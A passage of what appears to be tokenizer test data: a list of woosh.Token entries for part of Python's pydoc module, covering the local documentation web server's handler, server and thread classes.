woosh.Token(woosh.OP, '(', 2278, 31, 2278, 32),
woosh.Token(woosh.STRING, "'ignore'", 2278, 32, 2278, 40),
woosh.Token(woosh.OP, ')', 2278, 40, 2278, 41),
woosh.Token(woosh.COMMENT, '# ignore problems during import', 2278, 42, 2278, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 2278, 73, 2279, 0),
woosh.Token(woosh.NAME, 'ModuleScanner', 2279, 8, 2279, 21),
woosh.Token(woosh.OP, '(', 2279, 21, 2279, 22),
woosh.Token(woosh.OP, ')', 2279, 22, 2279, 23),
woosh.Token(woosh.OP, '.', 2279, 23, 2279, 24),
woosh.Token(woosh.NAME, 'run', 2279, 24, 2279, 27),
woosh.Token(woosh.OP, '(', 2279, 27, 2279, 28),
woosh.Token(woosh.NAME, 'callback', 2279, 28, 2279, 36),
woosh.Token(woosh.OP, ',', 2279, 36, 2279, 37),
woosh.Token(woosh.NAME, 'key', 2279, 38, 2279, 41),
woosh.Token(woosh.OP, ',', 2279, 41, 2279, 42),
woosh.Token(woosh.NAME, 'onerror', 2279, 43, 2279, 50),
woosh.Token(woosh.OP, '=', 2279, 50, 2279, 51),
woosh.Token(woosh.NAME, 'onerror', 2279, 51, 2279, 58),
woosh.Token(woosh.OP, ')', 2279, 58, 2279, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 2279, 59, 2280, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------- enhanced Web browser interface', 2281, 0, 2281, 72),
woosh.Token(woosh.DEDENT, '', 2283, 0, 2283, 0),
woosh.Token(woosh.DEDENT, '', 2283, 0, 2283, 0),
woosh.Token(woosh.NAME, 'def', 2283, 0, 2283, 3),
woosh.Token(woosh.NAME, '_start_server', 2283, 4, 2283, 17),
woosh.Token(woosh.OP, '(', 2283, 17, 2283, 18),
woosh.Token(woosh.NAME, 'urlhandler', 2283, 18, 2283, 28),
woosh.Token(woosh.OP, ',', 2283, 28, 2283, 29),
woosh.Token(woosh.NAME, 'hostname', 2283, 30, 2283, 38),
woosh.Token(woosh.OP, ',', 2283, 38, 2283, 39),
woosh.Token(woosh.NAME, 'port', 2283, 40, 2283, 44),
woosh.Token(woosh.OP, ')', 2283, 44, 2283, 45),
woosh.Token(woosh.OP, ':', 2283, 45, 2283, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2283, 46, 2284, 0),
woosh.Token(woosh.INDENT, ' ', 2284, 0, 2284, 4),
woosh.Token(woosh.STRING, '"""Start an HTTP server thread on a specific port.\r\n\r\n Start an HTML/text server thread, so HTML or text documents can be\r\n browsed dynamically and interactively with a Web browser. Example use:\r\n\r\n >>> import time\r\n >>> import pydoc\r\n\r\n Define a URL handler. To determine what the client is asking\r\n for, check the URL and content_type.\r\n\r\n Then get or generate some text or HTML code and return it.\r\n\r\n >>> def my_url_handler(url, content_type):\r\n ... text = \'the URL sent was: (%s, %s)\' % (url, content_type)\r\n ... return text\r\n\r\n Start server thread on port 0.\r\n If you use port 0, the server will pick a random port number.\r\n You can then use serverthread.port to get the port number.\r\n\r\n >>> port = 0\r\n >>> serverthread = pydoc._start_server(my_url_handler, port)\r\n\r\n Check that the server is really started. If it is, open browser\r\n and get first page. Use serverthread.url as the starting page.\r\n\r\n >>> if serverthread.serving:\r\n ... import webbrowser\r\n\r\n The next two lines are commented out so a browser doesn\'t open if\r\n doctest is run on this module.\r\n\r\n #... webbrowser.open(serverthread.url)\r\n #True\r\n\r\n Let the server do its thing. We just need to monitor its status.\r\n Use time.sleep so the loop doesn\'t hog the CPU.\r\n\r\n >>> starttime = time.monotonic()\r\n >>> timeout = 1 #seconds\r\n\r\n This is a short timeout for testing purposes.\r\n\r\n >>> while serverthread.serving:\r\n ... time.sleep(.01)\r\n ... if serverthread.serving and time.monotonic() - starttime > timeout:\r\n ... serverthread.stop()\r\n ... break\r\n\r\n Print any errors that may have occurred.\r\n\r\n >>> print(serverthread.error)\r\n None\r\n """', 2284, 4, 2338, 6),
woosh.Token(woosh.NEWLINE, '\r\n', 2338, 6, 2339, 0),
woosh.Token(woosh.NAME, 'import', 2339, 4, 2339, 10),
woosh.Token(woosh.NAME, 'http', 2339, 11, 2339, 15),
woosh.Token(woosh.OP, '.', 2339, 15, 2339, 16),
woosh.Token(woosh.NAME, 'server', 2339, 16, 2339, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2339, 22, 2340, 0),
woosh.Token(woosh.NAME, 'import', 2340, 4, 2340, 10),
woosh.Token(woosh.NAME, 'email', 2340, 11, 2340, 16),
woosh.Token(woosh.OP, '.', 2340, 16, 2340, 17),
woosh.Token(woosh.NAME, 'message', 2340, 17, 2340, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2340, 24, 2341, 0),
woosh.Token(woosh.NAME, 'import', 2341, 4, 2341, 10),
woosh.Token(woosh.NAME, 'select', 2341, 11, 2341, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2341, 17, 2342, 0),
woosh.Token(woosh.NAME, 'import', 2342, 4, 2342, 10),
woosh.Token(woosh.NAME, 'threading', 2342, 11, 2342, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 2342, 20, 2343, 0),
woosh.Token(woosh.NAME, 'class', 2344, 4, 2344, 9),
woosh.Token(woosh.NAME, 'DocHandler', 2344, 10, 2344, 20),
woosh.Token(woosh.OP, '(', 2344, 20, 2344, 21),
woosh.Token(woosh.NAME, 'http', 2344, 21, 2344, 25),
woosh.Token(woosh.OP, '.', 2344, 25, 2344, 26),
woosh.Token(woosh.NAME, 'server', 2344, 26, 2344, 32),
woosh.Token(woosh.OP, '.', 2344, 32, 2344, 33),
woosh.Token(woosh.NAME, 'BaseHTTPRequestHandler', 2344, 33, 2344, 55),
woosh.Token(woosh.OP, ')', 2344, 55, 2344, 56),
woosh.Token(woosh.OP, ':', 2344, 56, 2344, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2344, 57, 2345, 0),
woosh.Token(woosh.INDENT, ' ', 2346, 0, 2346, 8),
woosh.Token(woosh.NAME, 'def', 2346, 8, 2346, 11),
woosh.Token(woosh.NAME, 'do_GET', 2346, 12, 2346, 18),
woosh.Token(woosh.OP, '(', 2346, 18, 2346, 19),
woosh.Token(woosh.NAME, 'self', 2346, 19, 2346, 23),
woosh.Token(woosh.OP, ')', 2346, 23, 2346, 24),
woosh.Token(woosh.OP, ':', 2346, 24, 2346, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2346, 25, 2347, 0),
woosh.Token(woosh.INDENT, ' ', 2347, 0, 2347, 12),
woosh.Token(woosh.STRING, '"""Process a request from an HTML browser.\r\n\r\n The URL received is in self.path.\r\n Get an HTML page from self.urlhandler and send it.\r\n """', 2347, 12, 2351, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 2351, 15, 2352, 0),
woosh.Token(woosh.NAME, 'if', 2352, 12, 2352, 14),
woosh.Token(woosh.NAME, 'self', 2352, 15, 2352, 19),
woosh.Token(woosh.OP, '.', 2352, 19, 2352, 20),
woosh.Token(woosh.NAME, 'path', 2352, 20, 2352, 24),
woosh.Token(woosh.OP, '.', 2352, 24, 2352, 25),
woosh.Token(woosh.NAME, 'endswith', 2352, 25, 2352, 33),
woosh.Token(woosh.OP, '(', 2352, 33, 2352, 34),
woosh.Token(woosh.STRING, "'.css'", 2352, 34, 2352, 40),
woosh.Token(woosh.OP, ')', 2352, 40, 2352, 41),
woosh.Token(woosh.OP, ':', 2352, 41, 2352, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2352, 42, 2353, 0),
woosh.Token(woosh.INDENT, ' ', 2353, 0, 2353, 16),
woosh.Token(woosh.NAME, 'content_type', 2353, 16, 2353, 28),
woosh.Token(woosh.OP, '=', 2353, 29, 2353, 30),
woosh.Token(woosh.STRING, "'text/css'", 2353, 31, 2353, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2353, 41, 2354, 0),
woosh.Token(woosh.DEDENT, ' ', 2354, 0, 2354, 12),
woosh.Token(woosh.NAME, 'else', 2354, 12, 2354, 16),
woosh.Token(woosh.OP, ':', 2354, 16, 2354, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2354, 17, 2355, 0),
woosh.Token(woosh.INDENT, ' ', 2355, 0, 2355, 16),
woosh.Token(woosh.NAME, 'content_type', 2355, 16, 2355, 28),
woosh.Token(woosh.OP, '=', 2355, 29, 2355, 30),
woosh.Token(woosh.STRING, "'text/html'", 2355, 31, 2355, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2355, 42, 2356, 0),
woosh.Token(woosh.DEDENT, ' ', 2356, 0, 2356, 12),
woosh.Token(woosh.NAME, 'self', 2356, 12, 2356, 16),
woosh.Token(woosh.OP, '.', 2356, 16, 2356, 17),
woosh.Token(woosh.NAME, 'send_response', 2356, 17, 2356, 30),
woosh.Token(woosh.OP, '(', 2356, 30, 2356, 31),
woosh.Token(woosh.NUMBER, '200', 2356, 31, 2356, 34),
woosh.Token(woosh.OP, ')', 2356, 34, 2356, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2356, 35, 2357, 0),
woosh.Token(woosh.NAME, 'self', 2357, 12, 2357, 16),
woosh.Token(woosh.OP, '.', 2357, 16, 2357, 17),
woosh.Token(woosh.NAME, 'send_header', 2357, 17, 2357, 28),
woosh.Token(woosh.OP, '(', 2357, 28, 2357, 29),
woosh.Token(woosh.STRING, "'Content-Type'", 2357, 29, 2357, 43),
woosh.Token(woosh.OP, ',', 2357, 43, 2357, 44),
woosh.Token(woosh.STRING, "'%s; charset=UTF-8'", 2357, 45, 2357, 64),
woosh.Token(woosh.OP, '%', 2357, 65, 2357, 66),
woosh.Token(woosh.NAME, 'content_type', 2357, 67, 2357, 79),
woosh.Token(woosh.OP, ')', 2357, 79, 2357, 80),
woosh.Token(woosh.NEWLINE, '\r\n', 2357, 80, 2358, 0),
woosh.Token(woosh.NAME, 'self', 2358, 12, 2358, 16),
woosh.Token(woosh.OP, '.', 2358, 16, 2358, 17),
woosh.Token(woosh.NAME, 'end_headers', 2358, 17, 2358, 28),
woosh.Token(woosh.OP, '(', 2358, 28, 2358, 29),
woosh.Token(woosh.OP, ')', 2358, 29, 2358, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2358, 30, 2359, 0),
woosh.Token(woosh.NAME, 'self', 2359, 12, 2359, 16),
woosh.Token(woosh.OP, '.', 2359, 16, 2359, 17),
woosh.Token(woosh.NAME, 'wfile', 2359, 17, 2359, 22),
woosh.Token(woosh.OP, '.', 2359, 22, 2359, 23),
woosh.Token(woosh.NAME, 'write', 2359, 23, 2359, 28),
woosh.Token(woosh.OP, '(', 2359, 28, 2359, 29),
woosh.Token(woosh.NAME, 'self', 2359, 29, 2359, 33),
woosh.Token(woosh.OP, '.', 2359, 33, 2359, 34),
woosh.Token(woosh.NAME, 'urlhandler', 2359, 34, 2359, 44),
woosh.Token(woosh.OP, '(', 2359, 44, 2359, 45),
woosh.Token(woosh.NAME, 'self', 2360, 16, 2360, 20),
woosh.Token(woosh.OP, '.', 2360, 20, 2360, 21),
woosh.Token(woosh.NAME, 'path', 2360, 21, 2360, 25),
woosh.Token(woosh.OP, ',', 2360, 25, 2360, 26),
woosh.Token(woosh.NAME, 'content_type', 2360, 27, 2360, 39),
woosh.Token(woosh.OP, ')', 2360, 39, 2360, 40),
woosh.Token(woosh.OP, '.', 2360, 40, 2360, 41),
woosh.Token(woosh.NAME, 'encode', 2360, 41, 2360, 47),
woosh.Token(woosh.OP, '(', 2360, 47, 2360, 48),
woosh.Token(woosh.STRING, "'utf-8'", 2360, 48, 2360, 55),
woosh.Token(woosh.OP, ')', 2360, 55, 2360, 56),
woosh.Token(woosh.OP, ')', 2360, 56, 2360, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2360, 57, 2361, 0),
woosh.Token(woosh.DEDENT, ' ', 2362, 0, 2362, 8),
woosh.Token(woosh.NAME, 'def', 2362, 8, 2362, 11),
woosh.Token(woosh.NAME, 'log_message', 2362, 12, 2362, 23),
woosh.Token(woosh.OP, '(', 2362, 23, 2362, 24),
woosh.Token(woosh.NAME, 'self', 2362, 24, 2362, 28),
woosh.Token(woosh.OP, ',', 2362, 28, 2362, 29),
woosh.Token(woosh.OP, '*', 2362, 30, 2362, 31),
woosh.Token(woosh.NAME, 'args', 2362, 31, 2362, 35),
woosh.Token(woosh.OP, ')', 2362, 35, 2362, 36),
woosh.Token(woosh.OP, ':', 2362, 36, 2362, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2362, 37, 2363, 0),
woosh.Token(woosh.COMMENT, "# Don't log messages.", 2363, 12, 2363, 33),
woosh.Token(woosh.INDENT, ' ', 2364, 0, 2364, 12),
woosh.Token(woosh.NAME, 'pass', 2364, 12, 2364, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2364, 16, 2365, 0),
woosh.Token(woosh.DEDENT, ' ', 2366, 0, 2366, 4),
woosh.Token(woosh.DEDENT, '', 2366, 4, 2366, 4),
woosh.Token(woosh.NAME, 'class', 2366, 4, 2366, 9),
woosh.Token(woosh.NAME, 'DocServer', 2366, 10, 2366, 19),
woosh.Token(woosh.OP, '(', 2366, 19, 2366, 20),
woosh.Token(woosh.NAME, 'http', 2366, 20, 2366, 24),
woosh.Token(woosh.OP, '.', 2366, 24, 2366, 25),
woosh.Token(woosh.NAME, 'server', 2366, 25, 2366, 31),
woosh.Token(woosh.OP, '.', 2366, 31, 2366, 32),
woosh.Token(woosh.NAME, 'HTTPServer', 2366, 32, 2366, 42),
woosh.Token(woosh.OP, ')', 2366, 42, 2366, 43),
woosh.Token(woosh.OP, ':', 2366, 43, 2366, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2366, 44, 2367, 0),
woosh.Token(woosh.INDENT, ' ', 2368, 0, 2368, 8),
woosh.Token(woosh.NAME, 'def', 2368, 8, 2368, 11),
woosh.Token(woosh.NAME, '__init__', 2368, 12, 2368, 20),
woosh.Token(woosh.OP, '(', 2368, 20, 2368, 21),
woosh.Token(woosh.NAME, 'self', 2368, 21, 2368, 25),
woosh.Token(woosh.OP, ',', 2368, 25, 2368, 26),
woosh.Token(woosh.NAME, 'host', 2368, 27, 2368, 31),
woosh.Token(woosh.OP, ',', 2368, 31, 2368, 32),
woosh.Token(woosh.NAME, 'port', 2368, 33, 2368, 37),
woosh.Token(woosh.OP, ',', 2368, 37, 2368, 38),
woosh.Token(woosh.NAME, 'callback', 2368, 39, 2368, 47),
woosh.Token(woosh.OP, ')', 2368, 47, 2368, 48),
woosh.Token(woosh.OP, ':', 2368, 48, 2368, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2368, 49, 2369, 0),
woosh.Token(woosh.INDENT, ' ', 2369, 0, 2369, 12),
woosh.Token(woosh.NAME, 'self', 2369, 12, 2369, 16),
woosh.Token(woosh.OP, '.', 2369, 16, 2369, 17),
woosh.Token(woosh.NAME, 'host', 2369, 17, 2369, 21),
woosh.Token(woosh.OP, '=', 2369, 22, 2369, 23),
woosh.Token(woosh.NAME, 'host', 2369, 24, 2369, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2369, 28, 2370, 0),
woosh.Token(woosh.NAME, 'self', 2370, 12, 2370, 16),
woosh.Token(woosh.OP, '.', 2370, 16, 2370, 17),
woosh.Token(woosh.NAME, 'address', 2370, 17, 2370, 24),
woosh.Token(woosh.OP, '=', 2370, 25, 2370, 26),
woosh.Token(woosh.OP, '(', 2370, 27, 2370, 28),
woosh.Token(woosh.NAME, 'self', 2370, 28, 2370, 32),
woosh.Token(woosh.OP, '.', 2370, 32, 2370, 33),
woosh.Token(woosh.NAME, 'host', 2370, 33, 2370, 37),
woosh.Token(woosh.OP, ',', 2370, 37, 2370, 38),
woosh.Token(woosh.NAME, 'port', 2370, 39, 2370, 43),
woosh.Token(woosh.OP, ')', 2370, 43, 2370, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2370, 44, 2371, 0),
woosh.Token(woosh.NAME, 'self', 2371, 12, 2371, 16),
woosh.Token(woosh.OP, '.', 2371, 16, 2371, 17),
woosh.Token(woosh.NAME, 'callback', 2371, 17, 2371, 25),
woosh.Token(woosh.OP, '=', 2371, 26, 2371, 27),
woosh.Token(woosh.NAME, 'callback', 2371, 28, 2371, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2371, 36, 2372, 0),
woosh.Token(woosh.NAME, 'self', 2372, 12, 2372, 16),
woosh.Token(woosh.OP, '.', 2372, 16, 2372, 17),
woosh.Token(woosh.NAME, 'base', 2372, 17, 2372, 21),
woosh.Token(woosh.OP, '.', 2372, 21, 2372, 22),
woosh.Token(woosh.NAME, '__init__', 2372, 22, 2372, 30),
woosh.Token(woosh.OP, '(', 2372, 30, 2372, 31),
woosh.Token(woosh.NAME, 'self', 2372, 31, 2372, 35),
woosh.Token(woosh.OP, ',', 2372, 35, 2372, 36),
woosh.Token(woosh.NAME, 'self', 2372, 37, 2372, 41),
woosh.Token(woosh.OP, '.', 2372, 41, 2372, 42),
woosh.Token(woosh.NAME, 'address', 2372, 42, 2372, 49),
woosh.Token(woosh.OP, ',', 2372, 49, 2372, 50),
woosh.Token(woosh.NAME, 'self', 2372, 51, 2372, 55),
woosh.Token(woosh.OP, '.', 2372, 55, 2372, 56),
woosh.Token(woosh.NAME, 'handler', 2372, 56, 2372, 63),
woosh.Token(woosh.OP, ')', 2372, 63, 2372, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2372, 64, 2373, 0),
woosh.Token(woosh.NAME, 'self', 2373, 12, 2373, 16),
woosh.Token(woosh.OP, '.', 2373, 16, 2373, 17),
woosh.Token(woosh.NAME, 'quit', 2373, 17, 2373, 21),
woosh.Token(woosh.OP, '=', 2373, 22, 2373, 23),
woosh.Token(woosh.NAME, 'False', 2373, 24, 2373, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2373, 29, 2374, 0),
woosh.Token(woosh.DEDENT, ' ', 2375, 0, 2375, 8),
woosh.Token(woosh.NAME, 'def', 2375, 8, 2375, 11),
woosh.Token(woosh.NAME, 'serve_until_quit', 2375, 12, 2375, 28),
woosh.Token(woosh.OP, '(', 2375, 28, 2375, 29),
woosh.Token(woosh.NAME, 'self', 2375, 29, 2375, 33),
woosh.Token(woosh.OP, ')', 2375, 33, 2375, 34),
woosh.Token(woosh.OP, ':', 2375, 34, 2375, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2375, 35, 2376, 0),
woosh.Token(woosh.INDENT, ' ', 2376, 0, 2376, 12),
woosh.Token(woosh.NAME, 'while', 2376, 12, 2376, 17),
woosh.Token(woosh.NAME, 'not', 2376, 18, 2376, 21),
woosh.Token(woosh.NAME, 'self', 2376, 22, 2376, 26),
woosh.Token(woosh.OP, '.', 2376, 26, 2376, 27),
woosh.Token(woosh.NAME, 'quit', 2376, 27, 2376, 31),
woosh.Token(woosh.OP, ':', 2376, 31, 2376, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2376, 32, 2377, 0),
woosh.Token(woosh.INDENT, ' ', 2377, 0, 2377, 16),
woosh.Token(woosh.NAME, 'rd', 2377, 16, 2377, 18),
woosh.Token(woosh.OP, ',', 2377, 18, 2377, 19),
woosh.Token(woosh.NAME, 'wr', 2377, 20, 2377, 22),
woosh.Token(woosh.OP, ',', 2377, 22, 2377, 23),
woosh.Token(woosh.NAME, 'ex', 2377, 24, 2377, 26),
woosh.Token(woosh.OP, '=', 2377, 27, 2377, 28),
woosh.Token(woosh.NAME, 'select', 2377, 29, 2377, 35),
woosh.Token(woosh.OP, '.', 2377, 35, 2377, 36),
woosh.Token(woosh.NAME, 'select', 2377, 36, 2377, 42),
woosh.Token(woosh.OP, '(', 2377, 42, 2377, 43),
woosh.Token(woosh.OP, '[', 2377, 43, 2377, 44),
woosh.Token(woosh.NAME, 'self', 2377, 44, 2377, 48),
woosh.Token(woosh.OP, '.', 2377, 48, 2377, 49),
woosh.Token(woosh.NAME, 'socket', 2377, 49, 2377, 55),
woosh.Token(woosh.OP, '.', 2377, 55, 2377, 56),
woosh.Token(woosh.NAME, 'fileno', 2377, 56, 2377, 62),
woosh.Token(woosh.OP, '(', 2377, 62, 2377, 63),
woosh.Token(woosh.OP, ')', 2377, 63, 2377, 64),
woosh.Token(woosh.OP, ']', 2377, 64, 2377, 65),
woosh.Token(woosh.OP, ',', 2377, 65, 2377, 66),
woosh.Token(woosh.OP, '[', 2377, 67, 2377, 68),
woosh.Token(woosh.OP, ']', 2377, 68, 2377, 69),
woosh.Token(woosh.OP, ',', 2377, 69, 2377, 70),
woosh.Token(woosh.OP, '[', 2377, 71, 2377, 72),
woosh.Token(woosh.OP, ']', 2377, 72, 2377, 73),
woosh.Token(woosh.OP, ',', 2377, 73, 2377, 74),
woosh.Token(woosh.NUMBER, '1', 2377, 75, 2377, 76),
woosh.Token(woosh.OP, ')', 2377, 76, 2377, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 2377, 77, 2378, 0),
woosh.Token(woosh.NAME, 'if', 2378, 16, 2378, 18),
woosh.Token(woosh.NAME, 'rd', 2378, 19, 2378, 21),
woosh.Token(woosh.OP, ':', 2378, 21, 2378, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2378, 22, 2379, 0),
woosh.Token(woosh.INDENT, ' ', 2379, 0, 2379, 20),
woosh.Token(woosh.NAME, 'self', 2379, 20, 2379, 24),
woosh.Token(woosh.OP, '.', 2379, 24, 2379, 25),
woosh.Token(woosh.NAME, 'handle_request', 2379, 25, 2379, 39),
woosh.Token(woosh.OP, '(', 2379, 39, 2379, 40),
woosh.Token(woosh.OP, ')', 2379, 40, 2379, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2379, 41, 2380, 0),
woosh.Token(woosh.DEDENT, ' ', 2380, 0, 2380, 12),
woosh.Token(woosh.DEDENT, '', 2380, 12, 2380, 12),
woosh.Token(woosh.NAME, 'self', 2380, 12, 2380, 16),
woosh.Token(woosh.OP, '.', 2380, 16, 2380, 17),
woosh.Token(woosh.NAME, 'server_close', 2380, 17, 2380, 29),
woosh.Token(woosh.OP, '(', 2380, 29, 2380, 30),
woosh.Token(woosh.OP, ')', 2380, 30, 2380, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2380, 31, 2381, 0),
woosh.Token(woosh.DEDENT, ' ', 2382, 0, 2382, 8),
woosh.Token(woosh.NAME, 'def', 2382, 8, 2382, 11),
woosh.Token(woosh.NAME, 'server_activate', 2382, 12, 2382, 27),
woosh.Token(woosh.OP, '(', 2382, 27, 2382, 28),
woosh.Token(woosh.NAME, 'self', 2382, 28, 2382, 32),
woosh.Token(woosh.OP, ')', 2382, 32, 2382, 33),
woosh.Token(woosh.OP, ':', 2382, 33, 2382, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2382, 34, 2383, 0),
woosh.Token(woosh.INDENT, ' ', 2383, 0, 2383, 12),
woosh.Token(woosh.NAME, 'self', 2383, 12, 2383, 16),
woosh.Token(woosh.OP, '.', 2383, 16, 2383, 17),
woosh.Token(woosh.NAME, 'base', 2383, 17, 2383, 21),
woosh.Token(woosh.OP, '.', 2383, 21, 2383, 22),
woosh.Token(woosh.NAME, 'server_activate', 2383, 22, 2383, 37),
woosh.Token(woosh.OP, '(', 2383, 37, 2383, 38),
woosh.Token(woosh.NAME, 'self', 2383, 38, 2383, 42),
woosh.Token(woosh.OP, ')', 2383, 42, 2383, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2383, 43, 2384, 0),
woosh.Token(woosh.NAME, 'if', 2384, 12, 2384, 14),
woosh.Token(woosh.NAME, 'self', 2384, 15, 2384, 19),
woosh.Token(woosh.OP, '.', 2384, 19, 2384, 20),
woosh.Token(woosh.NAME, 'callback', 2384, 20, 2384, 28),
woosh.Token(woosh.OP, ':', 2384, 28, 2384, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2384, 29, 2385, 0),
woosh.Token(woosh.INDENT, ' ', 2385, 0, 2385, 16),
woosh.Token(woosh.NAME, 'self', 2385, 16, 2385, 20),
woosh.Token(woosh.OP, '.', 2385, 20, 2385, 21),
woosh.Token(woosh.NAME, 'callback', 2385, 21, 2385, 29),
woosh.Token(woosh.OP, '(', 2385, 29, 2385, 30),
woosh.Token(woosh.NAME, 'self', 2385, 30, 2385, 34),
woosh.Token(woosh.OP, ')', 2385, 34, 2385, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2385, 35, 2386, 0),
woosh.Token(woosh.DEDENT, ' ', 2387, 0, 2387, 4),
woosh.Token(woosh.DEDENT, '', 2387, 4, 2387, 4),
woosh.Token(woosh.DEDENT, '', 2387, 4, 2387, 4),
woosh.Token(woosh.NAME, 'class', 2387, 4, 2387, 9),
woosh.Token(woosh.NAME, 'ServerThread', 2387, 10, 2387, 22),
woosh.Token(woosh.OP, '(', 2387, 22, 2387, 23),
woosh.Token(woosh.NAME, 'threading', 2387, 23, 2387, 32),
woosh.Token(woosh.OP, '.', 2387, 32, 2387, 33),
woosh.Token(woosh.NAME, 'Thread', 2387, 33, 2387, 39),
woosh.Token(woosh.OP, ')', 2387, 39, 2387, 40),
woosh.Token(woosh.OP, ':', 2387, 40, 2387, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2387, 41, 2388, 0),
woosh.Token(woosh.INDENT, ' ', 2389, 0, 2389, 8),
woosh.Token(woosh.NAME, 'def', 2389, 8, 2389, 11),
woosh.Token(woosh.NAME, '__init__', 2389, 12, 2389, 20),
woosh.Token(woosh.OP, '(', 2389, 20, 2389, 21),
woosh.Token(woosh.NAME, 'self', 2389, 21, 2389, 25),
woosh.Token(woosh.OP, ',', 2389, 25, 2389, 26),
woosh.Token(woosh.NAME, 'urlhandler', 2389, 27, 2389, 37),
woosh.Token(woosh.OP, ',', 2389, 37, 2389, 38),
woosh.Token(woosh.NAME, 'host', 2389, 39, 2389, 43),
woosh.Token(woosh.OP, ',', 2389, 43, 2389, 44),
woosh.Token(woosh.NAME, 'port', 2389, 45, 2389, 49),
woosh.Token(woosh.OP, ')', 2389, 49, 2389, 50),
woosh.Token(woosh.OP, ':', 2389, 50, 2389, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 2389, 51, 2390, 0),
woosh.Token(woosh.INDENT, ' ', 2390, 0, 2390, 12),
woosh.Token(woosh.NAME, 'self', 2390, 12, 2390, 16),
woosh.Token(woosh.OP, '.', 2390, 16, 2390, 17),
woosh.Token(woosh.NAME, 'urlhandler', 2390, 17, 2390, 27),
woosh.Token(woosh.OP, '=', 2390, 28, 2390, 29),
woosh.Token(woosh.NAME, 'urlhandler', 2390, 30, 2390, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2390, 40, 2391, 0),
woosh.Token(woosh.NAME, 'self', 2391, 12, 2391, 16),
woosh.Token(woosh.OP, '.', 2391, 16, 2391, 17),
woosh.Token(woosh.NAME, 'host', 2391, 17, 2391, 21),
woosh.Token(woosh.OP, '=', 2391, 22, 2391, 23),
woosh.Token(woosh.NAME, 'host', 2391, 24, 2391, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2391, 28, 2392, 0),
woosh.Token(woosh.NAME, 'self', 2392, 12, 2392, 16),
woosh.Token(woosh.OP, '.', 2392, 16, 2392, 17),
woosh.Token(woosh.NAME, 'port', 2392, 17, 2392, 21),
woosh.Token(woosh.OP, '=', 2392, 22, 2392, 23),
woosh.Token(woosh.NAME, 'int', 2392, 24, 2392, 27),
woosh.Token(woosh.OP, '(', 2392, 27, 2392, 28),
woosh.Token(woosh.NAME, 'port', 2392, 28, 2392, 32),
woosh.Token(woosh.OP, ')', 2392, 32, 2392, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2392, 33, 2393, 0),
woosh.Token(woosh.NAME, 'threading', 2393, 12, 2393, 21),
woosh.Token(woosh.OP, '.', 2393, 21, 2393, 22),
woosh.Token(woosh.NAME, 'Thread', 2393, 22, 2393, 28),
woosh.Token(woosh.OP, '.', 2393, 28, 2393, 29),
woosh.Token(woosh.NAME, '__init__', 2393, 29, 2393, 37),
woosh.Token(woosh.OP, '(', 2393, 37, 2393, 38),
woosh.Token(woosh.NAME, 'self', 2393, 38, 2393, 42),
woosh.Token(woosh.OP, ')', 2393, 42, 2393, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 2393, 43, 2394, 0),
woosh.Token(woosh.NAME, 'self', 2394, 12, 2394, 16),
woosh.Token(woosh.OP, '.', 2394, 16, 2394, 17),
woosh.Token(woosh.NAME, 'serving', 2394, 17, 2394, 24),
woosh.Token(woosh.OP, '=', 2394, 25, 2394, 26),
woosh.Token(woosh.NAME, 'False', 2394, 27, 2394, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2394, 32, 2395, 0),
woosh.Token(woosh.NAME, 'self', 2395, 12, 2395, 16),
woosh.Token(woosh.OP, '.', 2395, 16, 2395, 17),
woosh.Token(woosh.NAME, 'error', 2395, 17, 2395, 22),
woosh.Token(woosh.OP, '=', 2395, 23, 2395, 24),
woosh.Token(woosh.NAME, 'None', 2395, 25, 2395, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2395, 29, 2396, 0),
woosh.Token(woosh.DEDENT, ' ', 2397, 0, 2397, 8),
woosh.Token(woosh.NAME, 'def', 2397, 8, 2397, 11),
woosh.Token(woosh.NAME, 'run', 2397, 12, 2397, 15),
woosh.Token(woosh.OP, '(', 2397, 15, 2397, 16),
woosh.Token(woosh.NAME, 'self', 2397, 16, 2397, 20),
woosh.Token(woosh.OP, ')', 2397, 20, 2397, 21),
woosh.Token(woosh.OP, ':', 2397, 21, 2397, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2397, 22, 2398, 0),
woosh.Token(woosh.INDENT, ' ', 2398, 0, 2398, 12),
